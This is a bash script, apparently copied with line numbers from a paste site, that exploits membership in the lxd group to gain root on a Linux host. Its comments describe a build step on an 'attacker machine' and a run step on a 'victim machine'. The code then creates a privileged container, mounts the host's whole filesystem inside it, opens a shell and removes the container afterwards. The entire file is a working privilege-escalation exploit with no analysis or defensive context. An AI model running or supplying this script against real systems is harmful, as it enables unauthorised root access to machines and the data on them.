#!/usr/bin/env bash# ----------------------------------# Authors: Marce

1.  
2. #!/usr/bin/env bash
3.  
4. # ----------------------------------
5. # Authors: Marcelo Vazquez (S4vitar)
6. # Victor Lasa (vowkin)
7. # ----------------------------------
8.  
9. # Step 1: Download build-alpine => wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine [Attacker Machine]
10. # Step 2: Build alpine => bash build-alpine (as root user) [Attacker Machine]
11. # Step 3: Run this script and you will get root [Victim Machine]
12. # Step 4: Once inside the container, navigate to /mnt/root to see all resources from the host machine
13.  
14. function helpPanel(){
15. echo -e "\nUsage:"
16. echo -e "\t[-f] Filename (.tar.gz alpine file)"
17. echo -e "\t[-h] Show this help panel\n"
18. exit 1
19. }
20.  
21. function createContainer(){
22. lxc image import $filename --alias alpine && lxd init --auto
23. echo -e "[*] Listing images...\n" && lxc image list
24. lxc init alpine privesc -c security.privileged=true
25. lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true
26. lxc start privesc
27. lxc exec privesc sh
28. cleanup
29. }
30.  
31. function cleanup(){
32. echo -en "\n[*] Removing container..."
33. lxc stop privesc && lxc delete privesc && lxc image delete alpine
34. echo " [√]"
35. }
36.  
37. set -o nounset
38. set -o errexit
39.  
40. declare -i parameter_enable=0; while getopts ":f:h:" arg; do
41. case $arg in
42. f) filename=$OPTARG && let parameter_enable+=1;;
43. h) helpPanel;;
44. esac
45. done
46.  
47. if [ $parameter_enable -ne 1 ]; then
48. helpPanel
49. else
50. createContainer
51. fi